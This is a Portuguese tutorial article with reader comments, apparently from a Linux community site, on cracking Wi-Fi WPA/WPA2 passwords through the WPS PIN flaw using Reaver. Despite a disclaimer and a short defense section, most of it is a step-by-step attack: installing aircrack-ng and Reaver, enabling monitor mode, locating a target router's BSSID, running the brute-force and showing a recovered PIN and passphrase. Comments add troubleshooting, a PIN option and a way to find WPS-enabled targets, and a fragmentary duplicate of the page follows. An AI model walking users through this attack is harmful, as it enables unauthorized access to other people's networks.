Reaver - Descobrindo Senhas Wi-Fi (Artigo)

Home (/index.php) / Artigos (/artigos/index.php) / Linux (/artigos/categoriaIndex.php?
codigo=1)
/ Segurana (/artigos/verSubCategoria.php?codigo=8) / Reaver - Descobrindo senhas Wi-Fi
Reaver - Descobrindo senhas Wi-Fi

Este artigo tem o objetivo de demonstrar, passo a passo, como
(/~cgentil) descobrir senhas Wi-Fi utilizando o Reaver, explorando uma
vulnerabilidade do protocolo WPS.
cgentil (/~cgentil)
Por: Clayton Visotto em 30/07/2014 [ Hits: 93.847 ]
28 2
Denuncie (/denuncie/index.php) Favoritos (/addBookmark.php?tipo=artigo&codigo=14818) Indicar

(/formIndicar.php?tipo=artigo&codigo=14818) Impressora (/artigos/impressora.php?codigo=14818)

SOBRE O REAVER
CONSIDERAES INICIAIS
A finalidade deste artigo, apenas didtica. Como todos aqui sabem, invaso crime e o
autor pode responder e pegar at 1 ano de priso (mais detalhes aqui
(http://g1.globo.com/politica/noticia/2012/10/senado-aprova-projeto-que-torna-crime-
invasao-de-computadores.html)).
Todos os testes foram feitos em minha rede particular. No me responsabilizo pelo mau
uso do mesmo.
Utilizei o Ubuntu 13.10.
O QUE REAVER?
Reaver uma ferramenta que pode ser utilizada para explorar uma
vulnerabilidade do protocolo WPS, utilizado pelas chaves do tipo WPA e WPA2, a fim de
resgatar a senha configurada no aparelho roteador.
Ele realiza um ataque de brute force sobre o cdigo PIN do roteador que composto por 8
caracteres numricos, onde o ltimo apenas um dgito de validao composto pela soma
dos primeiros.
O PIN code uma identificao numrica do router. Informando esse cdigo corretamente
para o roteador, ele informa qual a senha e SSID configurados no equipamento, ou seja, o
ataque consiste em capturarmos o PIN code para depois obtermos a senha, independente
de sua complexidade.
A falha no protocolo WPS e a consequente reduo de possibilidades numricas, torna

possvel recuperar a senha entre 4 e 10 horas, aps um certo nmero de combinaes do
cdigo PIN.
Se o ataque de fora bruta fosse aplicado diretamente sobre a senha, dependendo de sua
complexidade, poderia demorar semanas, at que a senha fosse quebrada, isso se ela
existir em seu dicionrio. Neste caso, como o ataque feito no PIN code, a complexidade
da senha no interfere no tempo de resposta do resultado final.
MTODO DE DEFESA
A melhor contramedida que pode ser adotada para evitar este tipo de ataque, desabilitar
o protocolo WPS ou utilizar firmwares atualizados que limitem as mensagens trocadas
entre o AP e os destinatrios, bloqueando a troca de pacotes aps um certo nmero de
tentativas.
INSTALAO
Instalando libs:
sudo apt-get update

sudo apt-get install build-essential
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-
dev libpcap0.8 libsqlite3-0
sudo apt-get install libssl-dev# Usado pelo Aircrack-ng
Instalando Aircrack-ng:
O Aircrack-ng ser utilizado para manipular a placa de rede Wi-Fi e identificar o BSSID alvo.
sudo apt-get install aircrack-ng
Caso no exista no repositrio, ser necessrio seguir os seguintes passos:

wgethttp://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz (http://download.aircrack-
ng.org/aircrack-ng-1.1.tar.gz)
tar -zxvf aircrack-ng-1.1.tar.gz
Edite o arquivo common.mak:
vi aircrack-ng-1.1/common.mak
Ache a linha abaixo:

CFLAGS?= -g -W -Wall -Werror -O3
Remova -Werror, conforme abaixo:
CFLAGS?= -g -W -Wall -O3
Salve o arquivo, monte o pacote e instale:
make
sudo make install

INSTALANDO O REAVER
sudo apt-get install reaver
Caso no exista no repositrio, ser necessrio seguir os seguintes passos:
wgethttp://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz (http://reaver-
wps.googlecode.com/files/reaver-1.4.tar.gz)
tar -xzvf reaver-1.4.tar.gz
cd reaver-1.4
cd src
./configure
make
sudo make install
Para conferir se foi instalado:

which reaver
O resultado ser:
/usr/local/bin/reaver
Tudo pronto para iniciar o ataque.
ATAQUE
Preparando o ataque:
Colocar a placa de rede Wi-Fi em modo monitor com o Aircrack-ng.
Identificar o alvo (capturar o BSSID do router alvo, utilizando tambm o Aircrack-ng).
Atacar (Reaver).
Para isso, seguir os passos abaixo:
Encontre o sua interface Wi-Fi:
iwconfig
Voc ver o nome da interface de rede sem fio, por exemplo wlan0.
Coloque sua placa Wireless em modo monitor:
sudo airmon-ng start wlan0
Monitor mode enabled on que muito provavelmente ser mon0.
Encontre o BSSID do roteador que voc quer crackear:
sudo airodump-ng mon0
BSSID o MAC address do roteador.

A rede deve ter WPA ou WPA2 listado na coluna ENC.
Ataque:
sudo reaver -i mon0 -b 00:00:00:00:00:00 -vv

Onde:
-i :: interface
-b :: BSSID (substituir o "00:00:00:00:00:00" pelo alvo)
-vv :: verbose (mostrar mensagens)
Deixe disparando e aguarde o resultado que ser semelhante ao da imagem:
(//img.vivaolinux.com.br/imagens/artigos/comunidade/reaver.jpg)

No meu caso, a senha foi quebrada em apenas 2 horas:
Pin cracked in 7302 seconds
WPS PIN: '10179178' (pin code do roteador)
WPA PSK: '79ri7gse6.c' (senha revelada!)
AP SSID: GENTIL
CONCLUSO
Como vimos, o Reaver capaz de quebrar a senha em pouqussimo tempo, comparado a

outras tcnicas de brute force que utilizam dicionrio de palavras.
Espero que tenha contribudo com o aprendizado dos leitores, lembrando que no devem
fazer mau uso deste recurso.
Obrigado.
Referncia: Reaver - Testes de segurana em redes sem fio [Artigo]
(http://www.vivaolinux.com.br/artigo/Reaver-Testes-de-seguranca-em-redes-sem-fio)
Pginas do artigo
1. Sobre o Reaver
Outros artigos deste autor
Nenhum artigo encontrado.
Leitura recomendada
Anlise sobre polticas de segurana da informao (/artigo/Analise-sobre-politicas-de-seguranca-da-

informacao)
Como assinar digitalmente um documento criado no Br/OpenOffice (/artigo/Como-assinar-digitalmente-

um-documento-criado-no-Br-OpenOffice)
Instalando o PFSense em uma mquina virtual (/artigo/Instalando-o-PFSense-em-uma-maquina-virtual)
OUTGUESS: Oculte mensagens em fotos (/artigo/OUTGUESS-Oculte-mensagens-em-fotos)
Recon and Scan with Metasploit (/artigo/Recon-and-Scan-with-Metasploit)
Comentrios
[1] Comentrio enviado por samid (/~samid) em 30/07/2014 - 09:52h
$sudo airodump-ng -i mon0
0 0
[2] Comentrio enviado por evaldoavelar (/~evaldoavelar) em 30/07/2014 -

13:25h
Muito bom! Obrigado!
0 0
[3] Comentrio enviado por px (/~px) em 30/07/2014 - 18:38h
Penso que em:

"Mtodo de defesa
A melhor contramedida que pode ser adotada para evitar este tipo de ataque, desabilitar o protocolo WPS
ou utilizar firmwares atualizados que limitem as mensagens trocadas entre o AP e os destinatrios,
bloqueando a troca de pacotes aps um certo nmero de tentativas. "
Deveria ser implementado o controle do MAC atrelado ao IP na rede local, alm das opes acima, e um
DHCP bem configurado ajudariam muito nessa mitigao tanto desse ataque como de vrios outros.
No mais o artigo esta bem simples e direto, como se props... parabns.
1 0
[4] Comentrio enviado por ednux (/~ednux) em 30/07/2014 - 21:40h
Na primeira vez no funcionou para mim, deu error: "WPS transaction failed (code: 0x02), re-trying last pin"
porque o WPS estava desativado. Mas depois de ativar ele, para o teste, o reaver descobriu a senha em 3
segundos. '-'
[+] Pin cracked in 3 seconds
Deve ser porque o meu modem ativa um pin padro na configurao automtica.... checando essas
configuraes ainda pude perceber que eu estava utilizando WPA, ao invs de WPA2 e.e
Parabns pelo artigo.

0 0
[5] Comentrio enviado por izaias (/~izaias) em 31/07/2014 - 00:54h
Uma dvida:
Estando com endereos MAC de apenas 3 dispositivos configurados para somente estes poderem usar
minha Wireless, ainda sim seria possvel usar este mtodo?
No sei se algum aqui sabe, mas impressoras Wireless da HP s funcionam no protocolo WPS habilitado.
Dependendo da resposta, vou desabilitar esse "tropeo" da HP!
0 0
[6] Comentrio enviado por cgentil (/~cgentil) em 31/07/2014 - 01:04h
[3] Comentrio enviado por px em 30/07/2014 - 18:38h:

Penso que em:
"Mtodo de defesa
A melhor contramedida que pode ser adotada para evitar este tipo de ataque, desabilitar o
protocolo WPS ou utilizar firmwares atualizados que limitem as mensagens trocadas entre o AP
e os destinatrios, bloqueando a troca de pacotes aps um certo nmero de tentativas. "
Deveria ser implementado o controle do MAC atrelado ao IP na rede local, alm das opes
acima, e um DHCP bem configurado ajudariam muito nessa mitigao tanto desse ataque como
de vrios outros.
No mais o artigo esta bem simples e direto, como se props... parabns.
Obrigado px, vc tem razo, essa mais uma forma de evitar esse tipo de ataque, mas tudo tem suas
vantagens e desvantagens. A desvantagem de utilizar o cadastro MAC quando chegar uma visita na sua
casa, por exemplo, e quiser conectar o celular na sua internet, a vai precisar pegar o mac do aparelho,
cadastrar.. enfim, um pouco mais trabalhoso, mas sem dvida mais seguro. Valeu por lembrar!
Abraos
1 0
[4] Comentrio enviado por ednux em 30/07/2014 - 21:40h:
Na primeira vez no funcionou para mim, deu error: "WPS transaction failed (code: 0x02), re-trying
last pin" porque o WPS estava desativado. Mas depois de ativar ele, para o teste, o reaver
descobriu a senha em 3 segundos. '-'
[+] Pin cracked in 3 seconds
Deve ser porque o meu modem ativa um pin padro na configurao automtica.... checando
essas configuraes ainda pude perceber que eu estava utilizando WPA, ao invs de WPA2 e.e
Parabns pelo artigo.
Valeu ednux! gostei do seu comentrio.. esse erro transaction failed.., re-trying last pin, tambm pode
ocorrer se o sinal estiver baixo. Qualquer perda mnima de pacote j suficiente para falhar o processo.
abraos!
1 0
[5] Comentrio enviado por izaias em 31/07/2014 - 00:54h:
Uma dvida:
Estando com endereos MAC de apenas 3 dispositivos configurados para somente estes
poderem usar minha Wireless, ainda sim seria possvel usar este mtodo?
No sei se algum aqui sabe, mas impressoras Wireless da HP s funcionam no protocolo WPS
habilitado.
Dependendo da resposta, vou desabilitar esse "tropeo" da HP!
Izaias, nesse caso, ser possvel descobrir a senha sim, porm no ser possvel conectar se o endereo
MAC no estiver cadastrado no seu router, mas ateno para um ponto: Se sua senha de conexo for a
mesma do admin do router, a possvel que o invasor acesse as configuraes e cadastre o prprio MAC

;)
1 0
[9] Comentrio enviado por izaias (/~izaias) em 31/07/2014 - 01:36h
[8] Comentrio enviado por cgentil em 31/07/2014 - 01:11h:
Izaias, nesse caso, ser possvel descobrir a senha sim, porm no ser possvel conectar se o
endereo MAC no estiver cadastrado no seu router, mas ateno para um ponto: Se sua senha
de conexo for a mesma do admin do router, a possvel que o invasor acesse as configuraes
e cadastre o prprio MAC ;)
No, a senha diferente.

Mas mesmo assim voc me assustou. :)
Vou desabilitar o WPS e usar a HP somente via cabo.
Isso um erro da HP!
Se estiverem interessados, segui esta matria do Olhar Digital para configurar minha rede:
-> http://olhardigital.uol.com.br/video/40837/40837 (http://olhardigital.uol.com.br/video/40837/40837)
Clayton, muito obrigado!
1 0
[10] Comentrio enviado por josuetaniel (/~josuetaniel) em 05/08/2014 - 12:42h
normal Failed ??
WARNING: Failed to associate with 94:CC:B9:05:40:6B (ESSID: (null
0 0
[11] Comentrio enviado por lilianalcantara (/~lilianalcantara) em 12/08/2014

- 03:23h
lilha@Cafe:~$sudo airodump-ng mon0

Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
0 0
[11] Comentrio enviado por lilianalcantara em 12/08/2014 - 03:23h:

Interface mon0:
Acontece quando vc no tem a interface mon0. Sua placa de rede wi-fi pode estar desligada ou no existe.
(confira com iwconfig)
0 0
[10] Comentrio enviado por josuetaniel em 05/08/2014 - 12:42h:
normal Failed ??
WARNING: Failed to associate with 94:CC:B9:05:40:6B (ESSID: (null
Algumas vezes acontece erros quando o sinal no est forte suficiente. Esse um dos erros possveis.

3 0

- 04:09h
[12] Comentrio enviado por cgentil em 12/08/2014 - 13:40h:

Interface mon0:
Acontece quando vc no tem a interface mon0. Sua placa de rede wi-fi pode estar desligada ou
no existe. (confira com iwconfig)
opa... pois aparece:
"ERRO ao obter marcadores da interface: Dispositivo inexistente"
minha placa est ligada, estou conectada por wi-fi, quando estava fazendo o teste desconectei da internet
(mas seguia visualizando todas as redes disponveis) e tentei atacar meu prprio modem, vou tentar
configurar a interface aqui... vlw, timo artigo! principalmente por explicar o que o que nos cdigos, sinto
falta disso em muitos artigos, com isto vamos aprendendo a nos virar sozinhos sem precisar cdigos
prontos toda vez...
0 0
[15] Comentrio enviado por Eveline-12738 (/~Eveline-12738) em 19/08/2014 -

08:45h
alguem ai sabe o comando que devo executar se eu ja tiver o pin???
1 0

[15] Comentrio enviado por Eveline-12738 em 19/08/2014 - 08:45h:
alguem ai sabe o comando que devo executar se eu ja tiver o pin???
Eveline, se vc der um $man reaver vc vai ver que tem a possibilidade de informar o pin como parmetro
tambm atravs do -p
No cheguei usar esse comando, mas tenta a e fala pra gente se deu certo ;)
valew!
1 0
- 12:49h
ainda no consegui resolver com iwconfig aparece q no h wireless em eth0
0 0
ainda no consegui resolver com iwconfig aparece q no h wireless em eth0
Lilian, a interface wireless deve aparecer como wlan0. A eth0 cabeada, entendeu?
Vc est usando maquina virtual? Se for virtual outro esquema, pq a wlan0 no vai aparecer por padro.
Ser preciso configurar.
1 0
[19] Comentrio enviado por djricardopl (/~djricardopl) em 20/08/2014 - 14:14h

ola galera estou usando o backtrack 5 r2

e reaver 1.4 esta tudo ok consegui fazer rodar tudo blz mas no final ele me da um pim e uma senha gigante
e nao conecta oque fazer
0 0
[19] Comentrio enviado por djricardopl em 20/08/2014 - 14:14h:

e reaver 1.4 esta tudo ok consegui fazer rodar tudo blz mas no final ele me da um pim e uma
senha gigante e nao conecta oque fazer
Eu no cheguei ver esse tipo de caso. Talvez essa senha gigante esteja criptografada. Se o AP tiver
bloqueio por MAC vc tb no vai conseguir conectar.
0 0
[21] Comentrio enviado por djricardopl (/~djricardopl) em 20/08/2014 - 14:28h
o mais estranho e que essa senha sempre muda quando fao o processo novamente
0 0
[22] Comentrio enviado por Fabianoshz (/~Fabianoshz) em 25/09/2014 - 16:43h
Como eu fao esse teste de forma incremental?
Queria testar no meu roteador, pra saber quantos % faltam pra ele chegar no ltimo PIN e poder estimar
qual o tempo mximo que demora na minha rede.
0 0

[23] Comentrio enviado por DarkS666 (/~DarkS666) em 08/10/2014 - 09:14h
Mano necessriamente e preciso estar conectado a rede para poder quebr-la ou no ?
0 0
[22] Comentrio enviado por Fabianoshz em 25/09/2014 - 16:43h:
Como eu fao esse teste de forma incremental?
Queria testar no meu roteador, pra saber quantos % faltam pra ele chegar no ltimo PIN e poder
estimar qual o tempo mximo que demora na minha rede.
Fabiano, no sei se da pra ter ideia de tempo, pois a velocidade pode variar de acordo com o nvel de sinal,
mas de qualquer forma, durante o ataque ele vai mostrando a porcentagem na tela. Eu na tive experincia
com mais de 5 horas para o trmino.
Espero que tenha ajudado.
Abs
0 0
[23] Comentrio enviado por DarkS666 em 08/10/2014 - 09:14h:
Mano necessriamente e preciso estar conectado a rede para poder quebr-la ou no ?
Cara, no... tanto que se vc precisasse estar conectado, acho que no faria sentido voc descobrir a senha,
pois teoricamente, se estiver conectado porque vc ja sabe ;)
Somente o sinal precisa estar bom, a senha precisa estar em WPA ou WPA2 e o router no pode ter o
recurso que limite as mensagens trocadas entre o AP e os destinatrios, como descrevi no modo de
defesa, pois caso contrrio, aps algumas tentativas o router vai parar de responder.
Abs
0 0
[26] Comentrio enviado por lucashferreira (/~lucashferreira) em 11/10/2014 -

14:28h
Estava lendo os comentrios e vi que alguma outra pessoa teve o mesmo erro que o meu.
O erro : WARNING: Failed to associate with64:66:B3:84:62:DE (ESSID: (null))
Voc disse que poderia ser que a rede esta com sinal fraco, mas no meu caso o sinal est forte e mesmo
assim persiste o erro. Estou usando ubuntu 14.04 em um notebook.
Se algum poder me ajudar, desde j agradeo.
0 0
[27] Comentrio enviado por raulmanoelr (/~raulmanoelr) em 14/10/2014 - 23:31h
Aqui est acontecendo o mesmo erro:

[!] WARNING: Failed to associate with 1C:7E:E5:CE:71:AE (ESSID: (null))
0 0
[28] Comentrio enviado por guilhermefisico (/~guilhermefisico) em 16/11/2014

- 16:50h
No meu da isso:
[+] Switching mon0 to channel 1
Est assim a umas duas horas, isso normal?
1 0
[29] Comentrio enviado por josesandroab (/~josesandroab) em 06/12/2014 -

15:47h
J foi perguntado aqui e no foi respondido, o que isso significa?
"WARNING: Failed to associate with64:66:B3:84:62:DE (ESSID: (null))"
0 0
[28] Comentrio enviado por guilhermefisico em 16/11/2014 - 16:50h:

No meu da isso:
Est assim a umas duas horas, isso normal?
Isso j aconteceu comigo ao tentar scanear uma rede de celular. Talves seja um AP de aparelho celular.
1 0
[31] Comentrio enviado por brianapalm (/~brianapalm) em 22/12/2014 - 13:47h
Amigos e se caso eu j tenha o PIN do aparelho, qual seria o procedimento?
0 0
Adicione o parmetro -p para informar o pin code. Exemplo:
sudo reaver -i mon0 -b 68:15:90:FC:85:59 -p 76718441 -vv
[]'s
0 0
[33] Comentrio enviado por LuizJolo (/~LuizJolo) em 31/01/2015 - 11:17h
o meu fica testando sempre com PIN 12345670

ele no altera nas tentativas normal?
0 0
[34] Comentrio enviado por edrsantos (/~edrsantos) em 08/02/2015 - 20:20h
[33] Comentrio enviado por LuizJolo em 31/01/2015 - 11:17h
o meu fica testando sempre com PIN 12345670

ele no altera nas tentativas normal?
o meu tbm fica assim, alguem sabe o que pode ser?

outra dvida, o comando para saber se o WPS est ativado "sudo wash -i mon0 --ignore-fcs ", funciona
mesmo?
0 0

[35] Comentrio enviado por angkor (/~angkor) em 25/02/2015 - 11:30h
[19] Comentrio enviado por djricardopl em 20/08/2014 - 14:14h

Estou com o mesmo problema, estou testando minha rede e me retorna uma senha muito grande e no
possvel fazer a autenticao com ela.
0 0
[36] Comentrio enviado por Warlock51 (/~Warlock51) em 04/03/2015 - 10:58h
[35] Comentrio enviado por angkor em 25/02/2015 - 11:30h
[19] Comentrio enviado por djricardopl em 20/08/2014 - 14:14h

Estou com o mesmo problema, estou testando minha rede e me retorna uma senha muito grande
e no possvel fazer a autenticao com ela.
Tb tenho esse problema cada hora vem uma senha gigante e no conecta.
0 0
[37] Comentrio enviado por pahiola (/~pahiola) em 10/03/2015 - 19:26h

No consegui encontrar a BSSID
apareceu PID
ajuda?
1 0
[38] Comentrio enviado por fabioassis89 (/~fabioassis89) em 18/03/2015 -

15:07h
ao dar o comando para editar a linha

dite o arquivo common.mak:
$ vi aircrack-ng-1.1/common.mak
CFLAGS ?= -g -W -Wall -Werror -O3

nao aparecece nada escrito, o que fazer
ubuntu 14.04
1 0
[39] Comentrio enviado por Raphabeta13 (/~Raphabeta13) em 28/03/2015 - 05:19h
Ola, Sou novo no Linux, quando diz:

"Remova -Werror, conforme abaixo:
CFLAGS ?= -g -W -Wall -O3
$ make
$ sudo make install "
eu consigo remover e salvar, mas como fao pra montar o pacote e instalar ?
pque logo apos que salvo e tento dar o comando $ make ja da erro.
o que fao ?
3 0
[40] Comentrio enviado por malkand (/~malkand) em 03/04/2015 - 18:31h
[39] Comentrio enviado por Raphabeta13 em 28/03/2015 - 05:19h
Ola, Sou novo no Linux, quando diz:

"Remova -Werror, conforme abaixo:
CFLAGS ?= -g -W -Wall -O3
$ make
$ sudo make install "
eu consigo remover e salvar, mas como fao pra montar o pacote e instalar ?
pque logo apos que salvo e tento dar o comando $ make ja da erro.
o que fao ?
Comigo ocorre a mesma coisa. Consigo editar e salvar o arquivo, mas depois tbm d erro
$ make
make: *** No targets specified and no makefile found. Stop.
O que podemos fazer???
0 0
[41] Comentrio enviado por malkand (/~malkand) em 03/04/2015 - 21:10h
Faa o seguinte aps salvar o arquivo e sair:
$ cd aircrack-ng-1.1
$ make
$ sudo make install
1 0
[42] Comentrio enviado por gregorydias (/~gregorydias) em 30/04/2015 - 02:10h
Mediante a isso os roteadores podiam ter um boto "GET MAC" o usurio coloca a senha e o acesso s
liberado aps o boto ser pressionado.

O filtro de mac pararia de funcionar o usurio se conectaria 5 segundos aps o roteador cadastraria como
permitido todos os novos endereos de MAC conectados.
0 0
[43] Comentrio enviado por deglier (/~deglier) em 02/05/2015 - 18:49h
Ol, estou com um problema, fiz a instalao de todos os pacotes e programas. No pricedimento de ataque
onde se utiliza o comando "# reaver -i mon0 -b 00:00:00:00:00:00 -vv" aparece o seguinte:
[!] WARNING: Failed to associate with 00:1A:3F:1A:15:E8 (ESSID: XXX-ap)

[+] Associated with 00:00:00:00:00:00 (ESSID: XXX-ap)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending WSC NACK
Esta mensagem fica aparecendo repetitivamente ate o programa ser cancelado. Gostaria de uma resposta
sobre o problema.
7 0
[44] Comentrio enviado por GiullioV (/~GiullioV) em 05/08/2015 - 15:46h
Grato pelo tuto, gostaria de saber se posso utilizar mais de uma interface em modo monitor, no caso para
tentar acelerar o processo...
0 0
[45] Comentrio enviado por ricardosantosinf (/~ricardosantosinf) em

06/09/2015 - 19:29h
Boa tarde sou novo no linux, no estou conseguindo editar arquivo como vi algum poderia me ajudar
1 0

[46] Comentrio enviado por Johnmike (/~Johnmike) em 17/09/2015 - 16:24h
ol, sou novo no linux e estou com um problema, quando eu coloco o comando sudo airodump-ng mon0
aparece a segunte mensagem:
ioctl(SIOCSIFFLAGS) failed: Name not unique on network
o que devo fazer?
6 0
[47] Comentrio enviado por Jaime albino (/~Jaime albino) em 16/12/2015 -

22:05h
[38] Comentrio enviado por fabioassis89 em 18/03/2015 - 15:07h


ubuntu 14.04
Amigo cmg o mesmo problema, por favor ajudem
2 0
[48] Comentrio enviado por Cheep (/~Cheep) em 24/12/2015 - 12:00h
depois do comando reaber -i ra0 -b (bassid) -vv o resultado esse de 1 a 14 e repetidamente normal ?
desconfio que o wps aqui esteja desativado como eu posso ativa-lo ?
[+] Switching ra0 to channel 1
[+] Switching ra0 to channe 14
--------------------------------------------------------------------------------------------------------------------------
0 0
[49] Comentrio enviado por lai32290 (/~lai32290) em 03/03/2016 - 08:21h
Eh possivel ativar WPS junto com senha do wifi? Parece que meu roteador nao esta permitindo
0 0
[50] Comentrio enviado por fabioalfalfa1986 (/~fabioalfalfa1986) em
24/06/2016 - 09:29h
Bom dia Galera, gostei deste tutorial porem comigo apresentou a seguinte tela. alguem pode me ajudar
estou errando em algum ponto.
!WARNING: FAILED TO ASSOCIATE WITCH 00:25:36:V5:G5:T8 (ESSID: NOME DA REDE)
0 0
[51] Comentrio enviado por jonaasferreirad (/~jonaasferreirad) em 10/07/2016

- 15:41h
Achei que pudssemos achar primeiro qual(is) roteador(es) esto habilitados com WPS. Da encontrei essa
linha que facilita pra ns vermos qual que poderemos atacar sem perder tempo:
$ sudo wash -i mon0 --ignore-fcs
OBS.: Coloca-se antes de atacar a rede.
0 0

[52] Comentrio enviado por jonaasferreirad (/~jonaasferreirad) em 10/07/2016
- 15:43h
[47] Comentrio enviado por Jaime albino em 16/12/2015 - 22:05h
[38] Comentrio enviado por fabioassis89 em 18/03/2015 - 15:07h


ubuntu 14.04
Amigo cmg o mesmo problema, por favor ajudem
O WPS est desabilitado com certeza, deu esta mesma mensagem em meu terminal. Tenta saber primeiro
qual rede est com WPS ativado:
$ sudo wash -i mon0 --ignore-fcs
OBS.: Coloca-se antes de atacar a rede.
0 0
[53] Comentrio enviado por adriano_goblin (/~adriano_goblin) em 10/07/2016 -

22:51h
[50] Comentrio enviado por fabioalfalfa1986 em 24/06/2016 - 09:29h
Bom dia Galera, gostei deste tutorial porem comigo apresentou a seguinte tela. alguem pode me
ajudar estou errando em algum ponto.

!WARNING: FAILED TO ASSOCIATE WITCH 00:25:36:V5:G5:T8 (ESSID: NOME DA REDE)
O meu tambm fica assim, voc conseguiu resolver?
0 0
[54] Comentrio enviado por thalles-nasc (/~thalles-nasc) em 15/08/2016 -

20:06h
Estou tentando pelo Kali Linux, mas quando comea o ataque aparece -Warning: dizendo q vai fazer re-
checking em 60 segundos- e fica assim repetindo sem sair disso. O que fao?
0 0
[55] Comentrio enviado por zak (/~zak) em 24/08/2016 - 09:04h
bom ate onde sei,o reaver nesses modelos atuais bloqueia o ataque,e me parece tambem que ele usa uma
base de dados com pins conhecidos para cada modelo e nao estando na base de dados......usando
goiscript ele nao reconhece os modelos de routers q ataco,mais ainda deve funcionar em alguns
casos,ate!!!
0 0
Contribuir com comentrio
Enviar
(/)
A maior comunidade GNU/Linux da Amrica Latina! Artigos, dicas, tutoriais, frum, scripts e muito mais. Ideal
para quem busca auto-ajuda.
FAQ - Perguntas frequentes (/faq.php)
Estatsticas do site (/estatisticas.php)
Equipe de moderadores (/equipe/)
Membros da comunidade (/membros/)

Anuncie (/anuncie/)
Contato (/falecom/)
Poltica de privacidade (/privacidade/)
Quem somos (/quemsomos/)
Termos de uso (/termos-de-uso/)
Site hospedado por:
(/verBanner.php?codigo=247)
Visite tambm: Viva o Android (https://www.vivaoandroid.com.br) BR-Linux.org (/verBanner.php?codigo=134) Dicas-L

(/verBanner.php?codigo=135) Diolinux (/verBanner.php?codigo=506) SoftwareLivre.org (/verBanner.php?codigo=133)
UnderLinux (/verBanner.php?codigo=131) Blog do Edivaldo (/verBanner.php?codigo=565)

Reaver - Descobrindo Senhas Wi-Fi (Artigo)

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Reaver - Descobrindo Senhas Wi-Fi (Artigo)

Загружено:

Авторское право:

Доступные форматы

Home (/index.php) / Artigos (/artigos/index.php) / Linux (/artigos/categoriaIndex.php?

Reaver - Descobrindo senhas Wi-Fi

Denuncie (/denuncie/index.php) Favoritos (/addBookmark.php?tipo=artigo&codigo=14818) Indicar

Utilizei o Ubuntu 13.10.

A falha no protocolo WPS e a consequente reduo de possibilidades numricas, torna

sudo apt-get update

sudo apt-get install aircrack-ng

Caso no exista no repositrio, ser necessrio seguir os seguintes passos:

Edite o arquivo common.mak:

Ache a linha abaixo:

Remova -Werror, conforme abaixo:

CFLAGS?= -g -W -Wall -O3

Salve o arquivo, monte o pacote e instale:

sudo apt-get install reaver

Caso no exista no repositrio, ser necessrio seguir os seguintes passos:

Para conferir se foi instalado:

Tudo pronto para iniciar o ataque.

Para isso, seguir os passos abaixo:

Encontre o sua interface Wi-Fi:

Coloque sua placa Wireless em modo monitor:

sudo airmon-ng start wlan0

Monitor mode enabled on que muito provavelmente ser mon0.

Encontre o BSSID do roteador que voc quer crackear:

sudo airodump-ng mon0

BSSID o MAC address do roteador.

sudo reaver -i mon0 -b 00:00:00:00:00:00 -vv

Deixe disparando e aguarde o resultado que ser semelhante ao da imagem:

Pin cracked in 7302 seconds

WPS PIN: '10179178' (pin code do roteador)

WPA PSK: '79ri7gse6.c' (senha revelada!)

Como vimos, o Reaver capaz de quebrar a senha em pouqussimo tempo, comparado a

Outros artigos deste autor

Nenhum artigo encontrado.

Anlise sobre polticas de segurana da informao (/artigo/Analise-sobre-politicas-de-seguranca-da-

Como assinar digitalmente um documento criado no Br/OpenOffice (/artigo/Como-assinar-digitalmente-

Instalando o PFSense em uma mquina virtual (/artigo/Instalando-o-PFSense-em-uma-maquina-virtual)

OUTGUESS: Oculte mensagens em fotos (/artigo/OUTGUESS-Oculte-mensagens-em-fotos)

Recon and Scan with Metasploit (/artigo/Recon-and-Scan-with-Metasploit)

[1] Comentrio enviado por samid (/~samid) em 30/07/2014 - 09:52h

$sudo airodump-ng -i mon0

[2] Comentrio enviado por evaldoavelar (/~evaldoavelar) em 30/07/2014 -

Muito bom! Obrigado!

[3] Comentrio enviado por px (/~px) em 30/07/2014 - 18:38h

Penso que em:

No mais o artigo esta bem simples e direto, como se props... parabns.

[4] Comentrio enviado por ednux (/~ednux) em 30/07/2014 - 21:40h

Parabns pelo artigo.

[5] Comentrio enviado por izaias (/~izaias) em 31/07/2014 - 00:54h

[6] Comentrio enviado por cgentil (/~cgentil) em 31/07/2014 - 01:04h

[3] Comentrio enviado por px em 30/07/2014 - 18:38h:

No mais o artigo esta bem simples e direto, como se props... parabns.

[7] Comentrio enviado por cgentil (/~cgentil) em 31/07/2014 - 01:07h

[4] Comentrio enviado por ednux em 30/07/2014 - 21:40h:

Parabns pelo artigo.

[8] Comentrio enviado por cgentil (/~cgentil) em 31/07/2014 - 01:11h

[5] Comentrio enviado por izaias em 31/07/2014 - 00:54h:

[9] Comentrio enviado por izaias (/~izaias) em 31/07/2014 - 01:36h

[8] Comentrio enviado por cgentil em 31/07/2014 - 01:11h:

No, a senha diferente.

-> http://olhardigital.uol.com.br/video/40837/40837 (http://olhardigital.uol.com.br/video/40837/40837)

Clayton, muito obrigado!

[10] Comentrio enviado por josuetaniel (/~josuetaniel) em 05/08/2014 - 12:42h

WARNING: Failed to associate with 94:CC:B9:05:40:6B (ESSID: (null